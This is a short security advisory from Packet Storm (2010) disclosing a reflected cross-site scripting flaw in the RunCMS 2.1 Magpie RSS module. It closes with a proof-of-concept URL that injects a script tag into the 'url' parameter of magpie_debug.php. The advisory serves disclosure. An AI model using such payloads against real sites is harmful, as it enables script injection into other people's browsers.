RunCMS 2.1 Magpie RSS Module Cross Site Scripting

2010-07-13T00:00:00
ID PACKETSTORM:91688
Type packetstorm
Reporter AutoSec Tools
Modified 2010-07-13T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................RunCMS 2.1 Magpie RSS Module  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://www.runcms.org/  
Release Date............7/5/2010  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................John Leitch  
Site....................http://cross-site-scripting.blogspot.com/  
Email...................john.leitch5@gmail.com  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie  
RSS Module can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E  
`